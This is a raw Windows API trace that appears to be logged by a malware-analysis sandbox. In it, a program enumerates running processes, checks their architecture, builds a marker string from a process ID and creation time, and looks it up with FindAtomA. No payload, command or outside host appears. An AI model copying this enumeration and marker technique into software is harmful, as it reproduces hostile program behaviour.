	[0072.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.558] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.558] CloseHandle (hObject=0x224) returned 1
	[0072.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728a98, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.558] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.558] CloseHandle (hObject=0x224) returned 1
	[0072.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.559] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.559] CloseHandle (hObject=0x224) returned 1
	[0072.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.559] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.559] CloseHandle (hObject=0x224) returned 1
	[0072.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.559] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.559] CloseHandle (hObject=0x224) returned 1
	[0072.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.559] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.559] CloseHandle (hObject=0x224) returned 1
	[0072.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728a38, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.560] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.560] CloseHandle (hObject=0x224) returned 1
	[0072.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.560] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.560] CloseHandle (hObject=0x224) returned 1
	[0072.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.560] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.560] CloseHandle (hObject=0x224) returned 1
	[0072.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728878, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.561] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.561] CloseHandle (hObject=0x224) returned 1
	[0072.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.561] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.561] CloseHandle (hObject=0x224) returned 1
	[0072.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.561] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.561] CloseHandle (hObject=0x224) returned 1
	[0072.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.561] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.561] CloseHandle (hObject=0x224) returned 1
	[0072.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.562] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.562] CloseHandle (hObject=0x224) returned 1
	[0072.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728838, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0072.562] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.562] CloseHandle (hObject=0x224) returned 1
	[0072.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.562] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.562] CloseHandle (hObject=0x224) returned 1
	[0072.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.562] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.562] CloseHandle (hObject=0x224) returned 1
	[0072.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.562] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.562] CloseHandle (hObject=0x224) returned 1
	[0072.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.563] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.563] CloseHandle (hObject=0x224) returned 1
	[0072.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.563] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.563] CloseHandle (hObject=0x224) returned 1
	[0072.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.563] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.563] CloseHandle (hObject=0x224) returned 1
	[0072.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.563] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.563] CloseHandle (hObject=0x224) returned 1
	[0072.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.563] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.563] CloseHandle (hObject=0x224) returned 1
	[0072.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.564] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.564] CloseHandle (hObject=0x224) returned 1
	[0072.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.564] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.564] CloseHandle (hObject=0x224) returned 1
	[0072.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.564] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.564] CloseHandle (hObject=0x224) returned 1
	[0072.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.564] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetLastError () returned 0x5
	[0072.565] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.565] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.565] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.566] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetLastError () returned 0x5
	[0072.567] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.568] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.568] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.568] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.568] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.568] CloseHandle (hObject=0x224) returned 1
	[0072.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.568] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.568] CloseHandle (hObject=0x224) returned 1
	[0072.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eb08, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.568] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.569] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.569] CloseHandle (hObject=0x224) returned 1
	[0072.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16db8) returned 0xc0000004
	[0072.617] VirtualAlloc (lpAddress=0x0, dwSize=0x16eb8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16eb8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
